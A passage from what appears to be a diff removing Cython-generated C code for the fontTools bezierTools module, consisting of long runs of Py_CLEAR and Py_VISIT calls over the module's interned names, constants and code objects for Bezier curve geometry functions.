Py_CLEAR(clear_module_state->__pyx_n_s_ey); - Py_CLEAR(clear_module_state->__pyx_n_s_failed); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc_arrayTools); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc_bezierTools); - Py_CLEAR(clear_module_state->__pyx_n_s_fontTools_misc_transform); - Py_CLEAR(clear_module_state->__pyx_n_s_found); - Py_CLEAR(clear_module_state->__pyx_kp_u_g); - Py_CLEAR(clear_module_state->__pyx_kp_u_gc); - Py_CLEAR(clear_module_state->__pyx_n_s_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_i); - Py_CLEAR(clear_module_state->__pyx_n_s_import); - Py_CLEAR(clear_module_state->__pyx_n_s_initializing); - Py_CLEAR(clear_module_state->__pyx_n_s_insert); - Py_CLEAR(clear_module_state->__pyx_n_s_intersection_ts); - Py_CLEAR(clear_module_state->__pyx_n_s_intersections); - Py_CLEAR(clear_module_state->__pyx_n_s_intersects); - Py_CLEAR(clear_module_state->__pyx_n_s_isHorizontal); - Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); - Py_CLEAR(clear_module_state->__pyx_n_s_isclose); - Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); - Py_CLEAR(clear_module_state->__pyx_n_s_it); - Py_CLEAR(clear_module_state->__pyx_n_s_key); - Py_CLEAR(clear_module_state->__pyx_n_s_line); - Py_CLEAR(clear_module_state->__pyx_n_s_lineLineIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_lineLineIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_lineLineIntersections_line_1147); - Py_CLEAR(clear_module_state->__pyx_n_s_linePointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_linePointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_line_t); - Py_CLEAR(clear_module_state->__pyx_n_s_line_t_of_pt); - Py_CLEAR(clear_module_state->__pyx_n_s_main); - Py_CLEAR(clear_module_state->__pyx_n_u_main); - Py_CLEAR(clear_module_state->__pyx_n_s_math); - Py_CLEAR(clear_module_state->__pyx_n_s_mid); - Py_CLEAR(clear_module_state->__pyx_n_s_midPt); - Py_CLEAR(clear_module_state->__pyx_n_s_midpoint); - Py_CLEAR(clear_module_state->__pyx_n_s_mult); - Py_CLEAR(clear_module_state->__pyx_n_s_n); - Py_CLEAR(clear_module_state->__pyx_n_s_name); - Py_CLEAR(clear_module_state->__pyx_n_s_namedtuple); - Py_CLEAR(clear_module_state->__pyx_n_s_obj); - Py_CLEAR(clear_module_state->__pyx_n_s_off1); - Py_CLEAR(clear_module_state->__pyx_n_s_off2); - Py_CLEAR(clear_module_state->__pyx_n_s_one); - Py_CLEAR(clear_module_state->__pyx_n_s_origDist); - Py_CLEAR(clear_module_state->__pyx_n_s_origin); - Py_CLEAR(clear_module_state->__pyx_n_s_p0); - Py_CLEAR(clear_module_state->__pyx_n_s_p1); - Py_CLEAR(clear_module_state->__pyx_n_s_p2); - Py_CLEAR(clear_module_state->__pyx_n_s_p3); - Py_CLEAR(clear_module_state->__pyx_n_s_pi); - Py_CLEAR(clear_module_state->__pyx_n_s_pointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_pointFinder); - Py_CLEAR(clear_module_state->__pyx_n_s_points); - Py_CLEAR(clear_module_state->__pyx_n_s_precision); - Py_CLEAR(clear_module_state->__pyx_n_s_print); - Py_CLEAR(clear_module_state->__pyx_n_s_printSegments); - Py_CLEAR(clear_module_state->__pyx_n_s_pt); - Py_CLEAR(clear_module_state->__pyx_n_u_pt); - Py_CLEAR(clear_module_state->__pyx_n_s_pt1); - Py_CLEAR(clear_module_state->__pyx_n_s_pt1x); - Py_CLEAR(clear_module_state->__pyx_n_s_pt1y); - Py_CLEAR(clear_module_state->__pyx_n_s_pt2); - Py_CLEAR(clear_module_state->__pyx_n_s_pt2x); - Py_CLEAR(clear_module_state->__pyx_n_s_pt2y); - Py_CLEAR(clear_module_state->__pyx_n_s_pt3); - Py_CLEAR(clear_module_state->__pyx_n_s_pt4); - Py_CLEAR(clear_module_state->__pyx_n_s_px); - Py_CLEAR(clear_module_state->__pyx_n_s_py); - Py_CLEAR(clear_module_state->__pyx_n_s_quadraticPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_quadraticPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_r); - Py_CLEAR(clear_module_state->__pyx_n_s_rDD); - Py_CLEAR(clear_module_state->__pyx_n_s_rQ2); - Py_CLEAR(clear_module_state->__pyx_n_s_range); - Py_CLEAR(clear_module_state->__pyx_n_s_range1); - Py_CLEAR(clear_module_state->__pyx_n_s_range2); - Py_CLEAR(clear_module_state->__pyx_n_s_rectArea); - Py_CLEAR(clear_module_state->__pyx_n_s_roots); - Py_CLEAR(clear_module_state->__pyx_n_s_rotate); - Py_CLEAR(clear_module_state->__pyx_n_s_round); - Py_CLEAR(clear_module_state->__pyx_n_s_s); - Py_CLEAR(clear_module_state->__pyx_n_s_s1); - Py_CLEAR(clear_module_state->__pyx_n_s_s1x); - Py_CLEAR(clear_module_state->__pyx_n_s_s1y); - Py_CLEAR(clear_module_state->__pyx_n_s_s2); - Py_CLEAR(clear_module_state->__pyx_n_s_s2x); - Py_CLEAR(clear_module_state->__pyx_n_s_s2y); - Py_CLEAR(clear_module_state->__pyx_kp_u_s_2); - Py_CLEAR(clear_module_state->__pyx_n_s_scale); - Py_CLEAR(clear_module_state->__pyx_n_s_sectRect); - Py_CLEAR(clear_module_state->__pyx_n_s_seen); - Py_CLEAR(clear_module_state->__pyx_n_s_seg); - Py_CLEAR(clear_module_state->__pyx_n_s_seg1); - Py_CLEAR(clear_module_state->__pyx_n_s_seg2); - Py_CLEAR(clear_module_state->__pyx_n_s_segment); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_segmentPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentSegmentIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_segmentSegmentIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_segmentSegmentIntersections_line); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentrepr); - Py_CLEAR(clear_module_state->__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_segmentrepr_line_1449); - Py_CLEAR(clear_module_state->__pyx_n_s_segmentrepr_locals_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_segments); - Py_CLEAR(clear_module_state->__pyx_n_s_send); - Py_CLEAR(clear_module_state->__pyx_n_s_slope12); - Py_CLEAR(clear_module_state->__pyx_n_s_slope34); - Py_CLEAR(clear_module_state->__pyx_n_s_solutions); - Py_CLEAR(clear_module_state->__pyx_n_s_solveCubic); - Py_CLEAR(clear_module_state->__pyx_n_u_solveCubic); - Py_CLEAR(clear_module_state->__pyx_kp_u_solveCubic_line_841); - Py_CLEAR(clear_module_state->__pyx_n_s_solveQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_u_solveQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_s_spec); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubic); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubic); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtTC_2); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicAtT_2); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubicAtT_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitCubicAtT_line_613); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubicIntoTwoAtTC); - Py_CLEAR(clear_module_state->__pyx_n_u_splitCubicIntoTwoAtTC); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitCubic_line_552); - Py_CLEAR(clear_module_state->__pyx_n_s_splitCubic_locals_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_splitLine); - Py_CLEAR(clear_module_state->__pyx_n_u_splitLine); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitLine_line_450); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_u_splitQuadratic); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadraticAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadraticAtT_2); - Py_CLEAR(clear_module_state->__pyx_n_u_splitQuadraticAtT_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitQuadraticAtT_line_589); - Py_CLEAR(clear_module_state->__pyx_kp_u_splitQuadratic_line_507); - Py_CLEAR(clear_module_state->__pyx_n_s_splitQuadratic_locals_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_split_cubic_into_two); - Py_CLEAR(clear_module_state->__pyx_n_s_split_segment_at_t); - Py_CLEAR(clear_module_state->__pyx_n_s_sqrt); - Py_CLEAR(clear_module_state->__pyx_n_s_start); - Py_CLEAR(clear_module_state->__pyx_n_s_swapped); - Py_CLEAR(clear_module_state->__pyx_n_s_sx); - Py_CLEAR(clear_module_state->__pyx_n_s_sy); - Py_CLEAR(clear_module_state->__pyx_n_s_sys); - Py_CLEAR(clear_module_state->__pyx_n_s_t); - Py_CLEAR(clear_module_state->__pyx_n_s_t1); - Py_CLEAR(clear_module_state->__pyx_n_u_t1); - Py_CLEAR(clear_module_state->__pyx_n_s_t1_2); - Py_CLEAR(clear_module_state->__pyx_n_s_t1_3); - Py_CLEAR(clear_module_state->__pyx_n_s_t2); - Py_CLEAR(clear_module_state->__pyx_n_u_t2); - Py_CLEAR(clear_module_state->__pyx_n_s_test); - Py_CLEAR(clear_module_state->__pyx_n_s_testmod); - Py_CLEAR(clear_module_state->__pyx_n_s_theta); - Py_CLEAR(clear_module_state->__pyx_n_s_throw); - Py_CLEAR(clear_module_state->__pyx_n_s_tolerance); - Py_CLEAR(clear_module_state->__pyx_n_s_transformPoints); - Py_CLEAR(clear_module_state->__pyx_n_s_translate); - Py_CLEAR(clear_module_state->__pyx_n_s_ts); - Py_CLEAR(clear_module_state->__pyx_n_s_two); - Py_CLEAR(clear_module_state->__pyx_n_s_unique_key); - Py_CLEAR(clear_module_state->__pyx_n_s_unique_values); - Py_CLEAR(clear_module_state->__pyx_n_s_v0); - Py_CLEAR(clear_module_state->__pyx_n_s_v1); - Py_CLEAR(clear_module_state->__pyx_n_s_v2); - Py_CLEAR(clear_module_state->__pyx_n_s_v3); - Py_CLEAR(clear_module_state->__pyx_n_s_v4); - Py_CLEAR(clear_module_state->__pyx_n_s_where); - Py_CLEAR(clear_module_state->__pyx_n_s_x); - Py_CLEAR(clear_module_state->__pyx_n_s_x0); - Py_CLEAR(clear_module_state->__pyx_n_s_x1); - Py_CLEAR(clear_module_state->__pyx_n_s_x2); - Py_CLEAR(clear_module_state->__pyx_n_s_x3); - Py_CLEAR(clear_module_state->__pyx_n_s_x4); - Py_CLEAR(clear_module_state->__pyx_n_s_xDiff); - Py_CLEAR(clear_module_state->__pyx_n_s_xRoots); - Py_CLEAR(clear_module_state->__pyx_n_s_y); - Py_CLEAR(clear_module_state->__pyx_n_s_y1); - Py_CLEAR(clear_module_state->__pyx_n_s_y2); - Py_CLEAR(clear_module_state->__pyx_n_s_y3); - Py_CLEAR(clear_module_state->__pyx_n_s_y4); - Py_CLEAR(clear_module_state->__pyx_n_s_yDiff); - Py_CLEAR(clear_module_state->__pyx_n_s_yRoots); - Py_CLEAR(clear_module_state->__pyx_float_0_0); - Py_CLEAR(clear_module_state->__pyx_float_0_5); - Py_CLEAR(clear_module_state->__pyx_float_1_0); - Py_CLEAR(clear_module_state->__pyx_float_2_0); - Py_CLEAR(clear_module_state->__pyx_float_3_0); - Py_CLEAR(clear_module_state->__pyx_float_4_0); - Py_CLEAR(clear_module_state->__pyx_float_9_0); - Py_CLEAR(clear_module_state->__pyx_float_1eneg_3); - Py_CLEAR(clear_module_state->__pyx_float_27_0); - Py_CLEAR(clear_module_state->__pyx_float_54_0); - Py_CLEAR(clear_module_state->__pyx_float_0_005); - Py_CLEAR(clear_module_state->__pyx_float_0_125); - Py_CLEAR(clear_module_state->__pyx_float_1eneg_10); - Py_CLEAR(clear_module_state->__pyx_float_neg_2_0); - Py_CLEAR(clear_module_state->__pyx_int_0); - Py_CLEAR(clear_module_state->__pyx_int_1); - Py_CLEAR(clear_module_state->__pyx_int_2); - Py_CLEAR(clear_module_state->__pyx_int_3); - Py_CLEAR(clear_module_state->__pyx_int_6); - Py_CLEAR(clear_module_state->__pyx_int_neg_1); - Py_CLEAR(clear_module_state->__pyx_codeobj_); - Py_CLEAR(clear_module_state->__pyx_tuple__2); - Py_CLEAR(clear_module_state->__pyx_tuple__4); - Py_CLEAR(clear_module_state->__pyx_tuple__5); - Py_CLEAR(clear_module_state->__pyx_tuple__6); - Py_CLEAR(clear_module_state->__pyx_tuple__8); - Py_CLEAR(clear_module_state->__pyx_tuple__12); - Py_CLEAR(clear_module_state->__pyx_tuple__14); - Py_CLEAR(clear_module_state->__pyx_tuple__15); - Py_CLEAR(clear_module_state->__pyx_tuple__17); - Py_CLEAR(clear_module_state->__pyx_tuple__19); - Py_CLEAR(clear_module_state->__pyx_tuple__21); - Py_CLEAR(clear_module_state->__pyx_tuple__23); - Py_CLEAR(clear_module_state->__pyx_tuple__26); - Py_CLEAR(clear_module_state->__pyx_tuple__28); - Py_CLEAR(clear_module_state->__pyx_tuple__30); - Py_CLEAR(clear_module_state->__pyx_tuple__32); - Py_CLEAR(clear_module_state->__pyx_tuple__34); - Py_CLEAR(clear_module_state->__pyx_tuple__36); - Py_CLEAR(clear_module_state->__pyx_tuple__38); - Py_CLEAR(clear_module_state->__pyx_tuple__40); - Py_CLEAR(clear_module_state->__pyx_tuple__42); - Py_CLEAR(clear_module_state->__pyx_tuple__44); - Py_CLEAR(clear_module_state->__pyx_tuple__46); - Py_CLEAR(clear_module_state->__pyx_tuple__48); - Py_CLEAR(clear_module_state->__pyx_tuple__50); - Py_CLEAR(clear_module_state->__pyx_tuple__52); - Py_CLEAR(clear_module_state->__pyx_tuple__53); - Py_CLEAR(clear_module_state->__pyx_tuple__55); - Py_CLEAR(clear_module_state->__pyx_tuple__57); - Py_CLEAR(clear_module_state->__pyx_tuple__59); - Py_CLEAR(clear_module_state->__pyx_tuple__61); - Py_CLEAR(clear_module_state->__pyx_tuple__63); - Py_CLEAR(clear_module_state->__pyx_tuple__65); - Py_CLEAR(clear_module_state->__pyx_tuple__67); - Py_CLEAR(clear_module_state->__pyx_tuple__69); - Py_CLEAR(clear_module_state->__pyx_tuple__71); - Py_CLEAR(clear_module_state->__pyx_tuple__73); - Py_CLEAR(clear_module_state->__pyx_tuple__75); - Py_CLEAR(clear_module_state->__pyx_tuple__77); - Py_CLEAR(clear_module_state->__pyx_tuple__79); - Py_CLEAR(clear_module_state->__pyx_tuple__81); - Py_CLEAR(clear_module_state->__pyx_tuple__83); - Py_CLEAR(clear_module_state->__pyx_tuple__85); - Py_CLEAR(clear_module_state->__pyx_tuple__87); - Py_CLEAR(clear_module_state->__pyx_tuple__89); - Py_CLEAR(clear_module_state->__pyx_tuple__92); - Py_CLEAR(clear_module_state->__pyx_tuple__94); - Py_CLEAR(clear_module_state->__pyx_tuple__95); - Py_CLEAR(clear_module_state->__pyx_tuple__97); - Py_CLEAR(clear_module_state->__pyx_tuple__99); - Py_CLEAR(clear_module_state->__pyx_codeobj__3); - Py_CLEAR(clear_module_state->__pyx_codeobj__7); - Py_CLEAR(clear_module_state->__pyx_tuple__101); - Py_CLEAR(clear_module_state->__pyx_codeobj__13); - Py_CLEAR(clear_module_state->__pyx_codeobj__16); - Py_CLEAR(clear_module_state->__pyx_codeobj__18); - Py_CLEAR(clear_module_state->__pyx_codeobj__20); - Py_CLEAR(clear_module_state->__pyx_codeobj__22); - Py_CLEAR(clear_module_state->__pyx_codeobj__24); - Py_CLEAR(clear_module_state->__pyx_codeobj__25); - Py_CLEAR(clear_module_state->__pyx_codeobj__27); - Py_CLEAR(clear_module_state->__pyx_codeobj__29); - Py_CLEAR(clear_module_state->__pyx_codeobj__31); - Py_CLEAR(clear_module_state->__pyx_codeobj__33); - Py_CLEAR(clear_module_state->__pyx_codeobj__35); - Py_CLEAR(clear_module_state->__pyx_codeobj__37); - Py_CLEAR(clear_module_state->__pyx_codeobj__39); - Py_CLEAR(clear_module_state->__pyx_codeobj__41); - Py_CLEAR(clear_module_state->__pyx_codeobj__43); - Py_CLEAR(clear_module_state->__pyx_codeobj__45); - Py_CLEAR(clear_module_state->__pyx_codeobj__47); - Py_CLEAR(clear_module_state->__pyx_codeobj__49); - Py_CLEAR(clear_module_state->__pyx_codeobj__51); - Py_CLEAR(clear_module_state->__pyx_codeobj__54); - Py_CLEAR(clear_module_state->__pyx_codeobj__56); - Py_CLEAR(clear_module_state->__pyx_codeobj__58); - Py_CLEAR(clear_module_state->__pyx_codeobj__60); - Py_CLEAR(clear_module_state->__pyx_codeobj__62); - Py_CLEAR(clear_module_state->__pyx_codeobj__64); - Py_CLEAR(clear_module_state->__pyx_codeobj__66); - Py_CLEAR(clear_module_state->__pyx_codeobj__68); - Py_CLEAR(clear_module_state->__pyx_codeobj__70); - Py_CLEAR(clear_module_state->__pyx_codeobj__72); - Py_CLEAR(clear_module_state->__pyx_codeobj__74); - Py_CLEAR(clear_module_state->__pyx_codeobj__76); - Py_CLEAR(clear_module_state->__pyx_codeobj__78); - Py_CLEAR(clear_module_state->__pyx_codeobj__80); - Py_CLEAR(clear_module_state->__pyx_codeobj__82); - Py_CLEAR(clear_module_state->__pyx_codeobj__84); - Py_CLEAR(clear_module_state->__pyx_codeobj__86); - Py_CLEAR(clear_module_state->__pyx_codeobj__88); - Py_CLEAR(clear_module_state->__pyx_codeobj__90); - Py_CLEAR(clear_module_state->__pyx_codeobj__93); - Py_CLEAR(clear_module_state->__pyx_codeobj__96); - Py_CLEAR(clear_module_state->__pyx_codeobj__98); - Py_CLEAR(clear_module_state->__pyx_codeobj__100); - Py_CLEAR(clear_module_state->__pyx_codeobj__102); - return 0; -} -#endif -/* #### Code section: module_state_traverse ### */ -#if CYTHON_USE_MODULE_STATE -static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { - __pyx_mstate *traverse_module_state = __pyx_mstate(m); - if (!traverse_module_state) return 0; - Py_VISIT(traverse_module_state->__pyx_d); - Py_VISIT(traverse_module_state->__pyx_b); - Py_VISIT(traverse_module_state->__pyx_cython_runtime); - Py_VISIT(traverse_module_state->__pyx_empty_tuple); - Py_VISIT(traverse_module_state->__pyx_empty_bytes); - Py_VISIT(traverse_module_state->__pyx_empty_unicode); - #ifdef __Pyx_CyFunction_USED - Py_VISIT(traverse_module_state->__pyx_CyFunctionType); - #endif - #ifdef __Pyx_FusedFunction_USED - Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); - #endif - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_1_t); - Py_VISIT(traverse_module_state->__pyx_n_s_1_t_2); - Py_VISIT(traverse_module_state->__pyx_n_s_2_t_1_t); - Py_VISIT(traverse_module_state->__pyx_kp_u_Approximates_the_arc_length_for); - Py_VISIT(traverse_module_state->__pyx_n_s_AttributeError); - Py_VISIT(traverse_module_state->__pyx_n_s_COMPILED); - Py_VISIT(traverse_module_state->__pyx_kp_u_Calculates_the_arc_length_for_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl); - Py_VISIT(traverse_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_Couldn_t_work_out_which_intersec); - Py_VISIT(traverse_module_state->__pyx_n_s_DD); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_a_cu); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_a_cu_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_two); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_two_2); - Py_VISIT(traverse_module_state->__pyx_n_s_Identity); - Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); - Py_VISIT(traverse_module_state->__pyx_n_s_Intersection); - Py_VISIT(traverse_module_state->__pyx_n_u_Intersection); - Py_VISIT(traverse_module_state->__pyx_n_s_Len); - Py_VISIT(traverse_module_state->__pyx_kp_s_Lib_fontTools_misc_bezierTools_p); - Py_VISIT(traverse_module_state->__pyx_n_s_Q); - Py_VISIT(traverse_module_state->__pyx_n_s_Q3); - Py_VISIT(traverse_module_state->__pyx_n_s_R); - Py_VISIT(traverse_module_state->__pyx_n_s_R2); - Py_VISIT(traverse_module_state->__pyx_n_s_R2_Q3); - Py_VISIT(traverse_module_state->__pyx_kp_u_Solve_a_cubic_equation_Solves_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_line_at_a_given_coordina); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2); - Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); - Py_VISIT(traverse_module_state->__pyx_kp_u_Unknown_curve_degree); - Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); - Py_VISIT(traverse_module_state->__pyx_kp_u__10); - Py_VISIT(traverse_module_state->__pyx_n_s__103); - Py_VISIT(traverse_module_state->__pyx_n_s__11); - Py_VISIT(traverse_module_state->__pyx_kp_u__9); - Py_VISIT(traverse_module_state->__pyx_n_s__91); - Py_VISIT(traverse_module_state->__pyx_n_s_a); - Py_VISIT(traverse_module_state->__pyx_n_s_a1); - Py_VISIT(traverse_module_state->__pyx_n_s_a1_3); - Py_VISIT(traverse_module_state->__pyx_n_s_a1x); - Py_VISIT(traverse_module_state->__pyx_n_s_a1y); - Py_VISIT(traverse_module_state->__pyx_n_s_a2); - Py_VISIT(traverse_module_state->__pyx_n_s_a3); - Py_VISIT(traverse_module_state->__pyx_n_s_acos); - Py_VISIT(traverse_module_state->__pyx_n_s_aligned_curve); - Py_VISIT(traverse_module_state->__pyx_n_s_alignment_transformation); - Py_VISIT(traverse_module_state->__pyx_n_s_all); - Py_VISIT(traverse_module_state->__pyx_n_s_angle); - Py_VISIT(traverse_module_state->__pyx_n_s_append); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_kp_u_approximateCubicArcLength_line_3); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_s_arch); - Py_VISIT(traverse_module_state->__pyx_n_s_args); - Py_VISIT(traverse_module_state->__pyx_n_s_asinh); - Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); - Py_VISIT(traverse_module_state->__pyx_n_s_atan2); - Py_VISIT(traverse_module_state->__pyx_n_s_ax); - Py_VISIT(traverse_module_state->__pyx_n_s_ax2); - Py_VISIT(traverse_module_state->__pyx_n_s_ax3); - Py_VISIT(traverse_module_state->__pyx_n_s_ay); - Py_VISIT(traverse_module_state->__pyx_n_s_ay2); - Py_VISIT(traverse_module_state->__pyx_n_s_ay3); - Py_VISIT(traverse_module_state->__pyx_n_s_b); - Py_VISIT(traverse_module_state->__pyx_n_s_b1); - Py_VISIT(traverse_module_state->__pyx_n_s_b1x); - Py_VISIT(traverse_module_state->__pyx_n_s_b1y); - Py_VISIT(traverse_module_state->__pyx_n_s_both_points_are_on_same_side_of); - Py_VISIT(traverse_module_state->__pyx_n_s_bounds1); - Py_VISIT(traverse_module_state->__pyx_n_s_bounds2); - Py_VISIT(traverse_module_state->__pyx_n_s_box); - Py_VISIT(traverse_module_state->__pyx_n_s_bx); - Py_VISIT(traverse_module_state->__pyx_n_s_bx2); - Py_VISIT(traverse_module_state->__pyx_n_s_by); - Py_VISIT(traverse_module_state->__pyx_n_s_by2); - Py_VISIT(traverse_module_state->__pyx_n_s_c); - Py_VISIT(traverse_module_state->__pyx_n_s_c1); - Py_VISIT(traverse_module_state->__pyx_n_s_c11); - Py_VISIT(traverse_module_state->__pyx_n_s_c11_range); - Py_VISIT(traverse_module_state->__pyx_n_s_c12); - Py_VISIT(traverse_module_state->__pyx_n_s_c12_range); - Py_VISIT(traverse_module_state->__pyx_n_s_c1x); - Py_VISIT(traverse_module_state->__pyx_n_s_c1y); - Py_VISIT(traverse_module_state->__pyx_n_s_c21); - Py_VISIT(traverse_module_state->__pyx_n_s_c21_range); - Py_VISIT(traverse_module_state->__pyx_n_s_c22); - Py_VISIT(traverse_module_state->__pyx_n_s_c22_range); - Py_VISIT(traverse_module_state->__pyx_n_s_calcBounds); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_calcCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_calcCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicArcLengthCRecurse); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicBounds); - Py_VISIT(traverse_module_state->__pyx_n_u_calcCubicBounds); - Py_VISIT(traverse_module_state->__pyx_kp_u_calcCubicBounds_line_412); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicParameters); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicPoints); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_calcQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_calcQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_kp_u_calcQuadraticArcLength_line_151); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticBounds); - Py_VISIT(traverse_module_state->__pyx_n_u_calcQuadraticBounds); - Py_VISIT(traverse_module_state->__pyx_kp_u_calcQuadraticBounds_line_298); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticParameters); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticPoints); - Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); - Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); - Py_VISIT(traverse_module_state->__pyx_n_s_close); - Py_VISIT(traverse_module_state->__pyx_n_s_collections); - Py_VISIT(traverse_module_state->__pyx_n_s_cos); - Py_VISIT(traverse_module_state->__pyx_n_s_cubicPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_cubicPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_cubicPointAtTC); - Py_VISIT(traverse_module_state->__pyx_n_u_cubicPointAtTC); - Py_VISIT(traverse_module_state->__pyx_n_s_curve); - Py_VISIT(traverse_module_state->__pyx_n_s_curve1); - Py_VISIT(traverse_module_state->__pyx_n_s_curve2); - Py_VISIT(traverse_module_state->__pyx_n_s_curveCurveIntersections); - 